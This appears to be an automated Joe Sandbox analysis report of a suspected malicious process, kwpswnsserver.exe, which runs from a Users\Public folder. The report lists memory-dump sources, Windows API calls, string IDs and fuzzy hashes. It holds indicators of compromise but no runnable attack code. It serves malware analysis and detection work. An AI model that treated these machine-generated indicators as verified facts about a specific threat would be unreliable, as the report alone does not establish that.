• swprintf.LIBCMT ref: 6C894532
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: swprintf$H_prolog3_LongWindow
• String ID: - $:%d
• API String ID: 524023746-2359489159
• Opcode ID: f3234017a2f7af4934c8d05fee391690a639cb4640ec94e0ef0945d35d31acb5
• Instruction ID: f169d94d2b3f415846dfd09eaa3b58ffed201bcfdde4a3f126b4077685d21422
• Opcode Fuzzy Hash: f3234017a2f7af4934c8d05fee391690a639cb4640ec94e0ef0945d35d31acb5
• Instruction Fuzzy Hash: EF31A5729015146AD724D7E8DE50FEEB32CFF15204F0048A5A629A7E91EB30EE49CBA0
Strings
• C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, xrefs: 6C9C4C09
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID:
• String ID: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
• API String ID: 0-3797387628
• Opcode ID: 6a12a76442e1da8e64df073ebb49c81abda17de8f15167b76afd5832aeeed000
• Instruction ID: c99cdada7fa32d54756f9b29bc6564e96b9d4eb21792bda4bf96369e5a450e94
• Opcode Fuzzy Hash: 6a12a76442e1da8e64df073ebb49c81abda17de8f15167b76afd5832aeeed000
• Instruction Fuzzy Hash: 4921CD32348216AFD7109F76CD809EB77ACAF653687048624E918D7A60EB31ED008F63
APIs
• GetModuleHandleW.KERNEL32(Advapi32.dll,E343E0B4,?,?,?,Function_0019BE40,000000FF), ref: 6C8A6CE1
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 6C8A6CF1
  • Part of subcall function 6C89B69C: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 6C89B6AF
  • Part of subcall function 6C89B69C: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 6C89B6BF
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: Advapi32.dll$RegDeleteKeyExW
• API String ID: 1646373207-2191092095
• Opcode ID: 0e0d7c62e2eeecdda0fbc00978acbe1ec29bf1c3f0d5e3bcbacc1c1af3376be7
• Instruction ID: 44806412eaae56886e732f03fb8b104412a363a41cc581de748d5a5c7396203b
• Opcode Fuzzy Hash: 0e0d7c62e2eeecdda0fbc00978acbe1ec29bf1c3f0d5e3bcbacc1c1af3376be7
• Instruction Fuzzy Hash: E411E675644316AFDF258F58CD04B49BB74FB0A759F00C92AE806D3A44CB32A902CB80
APIs
• __EH_prolog3.LIBCMT ref: 6C8AA0D6
• GetClassNameW.USER32(?,00000000,00000400), ref: 6C8AA107
• GetWindowLongW.USER32(?,000000F0), ref: 6C8AA140
Strings
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: ClassH_prolog3LongNameWindow
• String ID: ComboBox$ComboBoxEx32
• API String ID: 297531199-1907415764
• Opcode ID: 561b4fc4f45905c8d86b683e0aa6443437f1afe6beda7223a02062b6052cd0cc
• Instruction ID: 0dec5c2cf35d320be588b9248c9c5f5850ff2ef46c756498929bdb957ba7cc43
• Opcode Fuzzy Hash: 561b4fc4f45905c8d86b683e0aa6443437f1afe6beda7223a02062b6052cd0cc
• Instruction Fuzzy Hash: BF018475515626AADB249A94CE14BEEB774BF2132CF101D24E111A2EC0EF35E81DCA64
APIs
• FindResourceW.KERNEL32(00000000,?,PNG,?,?,?,6CA07E7C,?,6C904753,?,?,?,00000038,6C901E3E), ref: 6C90643F
• LoadResource.KERNEL32(00000000,00000000,?,6CA07E7C,?,6C904753,?,?,?,00000038,6C901E3E), ref: 6C90644D
• LockResource.KERNEL32(00000000,?,6CA07E7C,?,6C904753,?,?,?,00000038,6C901E3E), ref: 6C906458
• SizeofResource.KERNEL32(00000000,00000000,?,6CA07E7C,?,6C904753,?,?,?,00000038,6C901E3E), ref: 6C906466
Strings
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID: PNG
• API String ID: 3473537107-364855578
• Opcode ID: 64e5896d6def802a47d7c20ac4399b3267a0269c009dc9aa9424712841e819a9
• Instruction ID: 024a38b86f12b5c13cae2f12d64e7e95ed5a6ad2a180117e75672339c89d86cd
• Opcode Fuzzy Hash: 64e5896d6def802a47d7c20ac4399b3267a0269c009dc9aa9424712841e819a9
• Instruction Fuzzy Hash: 9DF06276702622BF5B116BA98C1CCAF767DEE966A93118229FD45E3600DB30DD81C6B0
APIs
• DecodePointer.KERNEL32(00000000), ref: 6C8A66FC
  • Part of subcall function 6C88A904: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6C88A92A
  • Part of subcall function 6C88A904: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C88A93A
  • Part of subcall function 6C88A904: EncodePointer.KERNEL32(00000000), ref: 6C88A943
• GetProcAddress.KERNEL32(00000000,DwmDefWindowProc), ref: 6C8A66E5
• EncodePointer.KERNEL32(00000000), ref: 6C8A66EE
Strings
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: Pointer$AddressEncodeProc$DecodeHandleModule
• String ID: DwmDefWindowProc$dwmapi.dll
• API String ID: 1102202064-234806475
• Opcode ID: 1a24e1b3c500a578ab9d158c35347af7676f925c8665971b7256a013cdb3208f
• Instruction ID: 4f1e38aa3fda46f9a1acb67d232757c56c3ea251c7ddcc9b8ad46c14df7c3076
• Opcode Fuzzy Hash: 1a24e1b3c500a578ab9d158c35347af7676f925c8665971b7256a013cdb3208f
• Instruction Fuzzy Hash: 21F0963661532BAFCF256FB8DD1885A3FB4FB0A7A43018921FC05D2614DB30C8128BA0
APIs
• DecodePointer.KERNEL32(00000000), ref: 6C8A68E3
  • Part of subcall function 6C88A904: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6C88A92A
  • Part of subcall function 6C88A904: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C88A93A
  • Part of subcall function 6C88A904: EncodePointer.KERNEL32(00000000), ref: 6C88A943
• GetProcAddress.KERNEL32(00000000,DwmSetIconicLivePreviewBitmap), ref: 6C8A68CC
• EncodePointer.KERNEL32(00000000), ref: 6C8A68D5
Strings
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: Pointer$AddressEncodeProc$DecodeHandleModule
• String ID: DwmSetIconicLivePreviewBitmap$dwmapi.dll
• API String ID: 1102202064-1757063745
• Opcode ID: a53b0c408b141a28544a4894593eb2bd7b9084268c19413dffcf1f1526af5e9d
• Instruction ID: ad8ee207ca0b48c9f0bf9045277ec0e65e761e5b3fd957e14f93c231a7e1c00e
• Opcode Fuzzy Hash: a53b0c408b141a28544a4894593eb2bd7b9084268c19413dffcf1f1526af5e9d
• Instruction Fuzzy Hash: 9AF02B3160133FAF8F252FA8CD1C85A3FB8BF053547058920FC15D6604E734C8128BA0
APIs
• DecodePointer.KERNEL32(00000000), ref: 6C8A67C0
  • Part of subcall function 6C88A904: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6C88A92A
  • Part of subcall function 6C88A904: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C88A93A
  • Part of subcall function 6C88A904: EncodePointer.KERNEL32(00000000), ref: 6C88A943
• GetProcAddress.KERNEL32(00000000,DwmSetWindowAttribute), ref: 6C8A67A9
• EncodePointer.KERNEL32(00000000), ref: 6C8A67B2
Strings
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: Pointer$AddressEncodeProc$DecodeHandleModule
• String ID: DwmSetWindowAttribute$dwmapi.dll
• API String ID: 1102202064-3105884578
• Opcode ID: 21c9af1433c712d8a00b01e52ab0de7ec595749e91eff6bab167e6f73bf7ee60
• Instruction ID: 828131a829ffcc8ad507a2bfec3b9b592e3c992c52604fc048dc5748b2d6857e
• Opcode Fuzzy Hash: 21c9af1433c712d8a00b01e52ab0de7ec595749e91eff6bab167e6f73bf7ee60
• Instruction Fuzzy Hash: 6CF0BB3565132BEFCF251FA8CD1885A3BB4AB067593008611FC09D6644D730C8128BA0
APIs
• DecodePointer.KERNEL32(00000000), ref: 6C8A6825
  • Part of subcall function 6C88A904: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6C88A92A
  • Part of subcall function 6C88A904: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C88A93A
  • Part of subcall function 6C88A904: EncodePointer.KERNEL32(00000000), ref: 6C88A943
• GetProcAddress.KERNEL32(00000000,DwmSetIconicThumbnail), ref: 6C8A680E
• EncodePointer.KERNEL32(00000000), ref: 6C8A6817
Strings
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: Pointer$AddressEncodeProc$DecodeHandleModule
• String ID: DwmSetIconicThumbnail$dwmapi.dll
• API String ID: 1102202064-2331651847
• Opcode ID: 94fc98718f80feeeeea32de0ba29d4c5e2d5a47b77f578a526464ab7c98fe4f3
• Instruction ID: 0d40190e4f0b9126a8355770a2b54680c6339946516ad3109f78ee54c4599e8d
• Opcode Fuzzy Hash: 94fc98718f80feeeeea32de0ba29d4c5e2d5a47b77f578a526464ab7c98fe4f3
• Instruction Fuzzy Hash: 84F05B7564133BABCF391FA88D1C9593F7CAF066997418521FC19D6744D730C44386A0
APIs
• DecodePointer.KERNEL32(00000000,?,?,6C89F0CE,6CA5821C,0000002C), ref: 6C8A6761
  • Part of subcall function 6C88A904: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6C88A92A
  • Part of subcall function 6C88A904: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C88A93A
  • Part of subcall function 6C88A904: EncodePointer.KERNEL32(00000000), ref: 6C88A943
• GetProcAddress.KERNEL32(00000000,DwmIsCompositionEnabled), ref: 6C8A674A
• EncodePointer.KERNEL32(00000000,?,?,6C89F0CE,6CA5821C,0000002C), ref: 6C8A6753
Strings
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: Pointer$AddressEncodeProc$DecodeHandleModule
• String ID: DwmIsCompositionEnabled$dwmapi.dll
• API String ID: 1102202064-1198327662
• Opcode ID: fe85fac2fa8126ae16acd06370eed0416cc17ae7a83d1a22589a63b34b2655ab
• Instruction ID: 3cd62c39e2020bc9119dd3be0e3e515855b90ddfe8c9d7e2fe225ad22fb0426a
• Opcode Fuzzy Hash: fe85fac2fa8126ae16acd06370eed0416cc17ae7a83d1a22589a63b34b2655ab
• Instruction Fuzzy Hash: 8DF0E03971132B9FCB1577BCCD1865A37B4BB0B7597008611FC05D7A44EB30C80286D0
APIs
• DecodePointer.KERNEL32(00000000), ref: 6C8A6887
  • Part of subcall function 6C88A904: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6C88A92A
  • Part of subcall function 6C88A904: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C88A93A
  • Part of subcall function 6C88A904: EncodePointer.KERNEL32(00000000), ref: 6C88A943
• GetProcAddress.KERNEL32(00000000,DwmInvalidateIconicBitmaps), ref: 6C8A6870
• EncodePointer.KERNEL32(00000000), ref: 6C8A6879
Strings
Memory Dump Source
• Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
Similarity
• API ID: Pointer$AddressEncodeProc$DecodeHandleModule
• String ID: DwmInvalidateIconicBitmaps$dwmapi.dll
• API String ID: 1102202064-1901905683
• Opcode ID: 9845fdb6d43bc07201db8286813571cb398b9a1b62e04dbcf6211e2c213b67a8
• Instruction ID: 6f03072c5f675d882f4718332b65d09b3dea3b971f5496c2adf87c88f6287ea9
• Opcode Fuzzy Hash: 9845fdb6d43bc07201db8286813571cb398b9a1b62e04dbcf6211e2c213b67a8
• Instruction Fuzzy Hash: EAF0823564133B9F8E3927AD8D1885937BCAB06799345C921EC05D6A08DB2488438AA0
APIs
  • Part of subcall function 6C8C6DF9: PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 6C8C6E33
  • Part of subcall function 6C8C6DF9: SetRectEmpty.USER32(?), ref: 6C8C6E5B
  • Part of subcall function 6C8C6DF9: GetDesktopWindow.USER32 ref: 6C8C6E73
  • Part of subcall function 6C8C6DF9: LockWindowUpdate.USER32(?,00000000), ref: 6C8C6E84
  • Part of subcall function 6C8C6DF9: GetDCEx.USER32(?,00000000,00000003), ref: 6C8C6E9B
  • Part of subcall function 6C883389: GetLayout.GDI32(?,6C8C63CC), ref: 6C88338C
• GetWindowRect.USER32(?,?), ref: 6C8C63FD
  • Part of subcall function 6C883393: SetLayout.GDI32(?,?), ref: 6C88339C
  • Part of subcall function 6C8C6235: AdjustWindowRectEx.USER32(?,?,00000000,00000188), ref: 6C8C6245
• InflateRect.USER32(?,00000002,00000002), ref: 6C8C671B
• InflateRect.USER32(00000000,00000002,00000002), ref: 6C8C6732
  • Part of subcall function 6C8C74B2: OffsetRect.USER32(?,00000000,00000000), ref: 6C8C74EB
  • Part of subcall function 6C8C679D: OffsetRect.USER32(?,?,?), ref: 6C8C67B7
  • Part of subcall function 6C8C679D: OffsetRect.USER32(?,?,?), ref: 6C8C67C3
  • Part of subcall function 6C8C679D: OffsetRect.USER32(?,?,?), ref: 6C8C67CF
  • Part of subcall function 6C8C679D: OffsetRect.USER32(?,?,?), ref: 6C8C67DB
  • Part of subcall function 6C8C7017: GetCapture.USER32 ref: 6C8C7021
                                                                    • Part of subcall function 6C8C7017: SetCapture.USER32(?), ref: 6C8C7035
                                                                    • Part of subcall function 6C8C7017: GetCapture.USER32 ref: 6C8C7041
                                                                    • Part of subcall function 6C8C7017: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 6C8C705F
                                                                    • Part of subcall function 6C8C7017: DispatchMessageW.USER32(?), ref: 6C8C709B
                                                                    • Part of subcall function 6C8C7017: GetCapture.USER32 ref: 6C8C70F9
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Offset$CaptureWindow$Message$InflateLayout$AdjustDesktopDispatchEmptyLockPeekUpdate
                                                                  • String ID:
                                                                  • API String ID: 2444846054-0
                                                                  • Opcode ID: 0af54804c7653b464ae3a82eb5f20b6c7512e9482bc0aa9acc8fc924876c11e9
                                                                  • Instruction ID: c1cef7df703340f34f2f9d8d59d81898c9f7094d658eff36374a12e49c273db5
                                                                  • Opcode Fuzzy Hash: 0af54804c7653b464ae3a82eb5f20b6c7512e9482bc0aa9acc8fc924876c11e9
                                                                  • Instruction Fuzzy Hash: 4FE12571E006199FCF15CF98C940AEEBBB2BF49314F15812AF919BB350DB71A942CB94
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C952437
                                                                  • InflateRect.USER32(?,000000FB,00000000), ref: 6C952537
                                                                  • InflateRect.USER32(?,000000FC,00000000), ref: 6C952546
                                                                  • FillRect.USER32(E85ECD33,?,00000000), ref: 6C9525D6
                                                                  • GetTextMetricsW.GDI32(FFFC3186,?), ref: 6C9526A4
                                                                    • Part of subcall function 6C8C9A5D: InflateRect.USER32(?,00000000,000000FD), ref: 6C8C9AB8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Inflate$FillH_prolog3_MetricsText
                                                                  • String ID:
                                                                  • API String ID: 2951402353-0
                                                                  • Opcode ID: fd26ab025a4a978f2d9f6c400a56ffaaae51cec83fafc82ecac7082b0018e764
                                                                  • Instruction ID: 5e74b598d4b3e996ab1729c4b459c82488cd393ca9ec0ba3dbea33e58c2c91af
                                                                  • Opcode Fuzzy Hash: fd26ab025a4a978f2d9f6c400a56ffaaae51cec83fafc82ecac7082b0018e764
                                                                  • Instruction Fuzzy Hash: 18B14971A00619DFCF14CF68C998AEEBBB9BF49304F504669E816AB781DB30E905CF50
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8BACFE
                                                                  • IsWindow.USER32(00000000), ref: 6C8BAD12
                                                                  • GetClientRect.USER32(00000000,00000000), ref: 6C8BAD67
                                                                  • GetCursorPos.USER32(?), ref: 6C8BAF30
                                                                  • ScreenToClient.USER32(00000000,?), ref: 6C8BAF3D
                                                                    • Part of subcall function 6C8B5891: __EH_prolog3_GS.LIBCMT ref: 6C8B589B
                                                                    • Part of subcall function 6C8B5891: GetClientRect.USER32(00000000,00000000), ref: 6C8B58F5
                                                                    • Part of subcall function 6C8B36CB: __EH_prolog3_GS.LIBCMT ref: 6C8B36D5
                                                                    • Part of subcall function 6C8B36CB: SendMessageW.USER32(00000000,0000040D,00000000,00000000), ref: 6C8B3700
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClientH_prolog3_$Rect$CursorMessageScreenSendWindow
                                                                  • String ID:
                                                                  • API String ID: 3214297127-0
                                                                  • Opcode ID: 03903e79603881bf156c0eb079048444d4b13e9ff215bdd8f0fa7cf5c2ee1e40
                                                                  • Instruction ID: 69868081405bc77b716e07bb661727be4abb2820663ce47cb471e66e4cb8096f
                                                                  • Opcode Fuzzy Hash: 03903e79603881bf156c0eb079048444d4b13e9ff215bdd8f0fa7cf5c2ee1e40
                                                                  • Instruction Fuzzy Hash: AB918971A012198FCF25DFA8CA80ADDBBB5BF49309F14457AE805BB755DB30A909CF60
                                                                  APIs
                                                                  • GetParent.USER32(8B6CA5B0), ref: 6C95279E
                                                                  • IsRectEmpty.USER32(?), ref: 6C9527C3
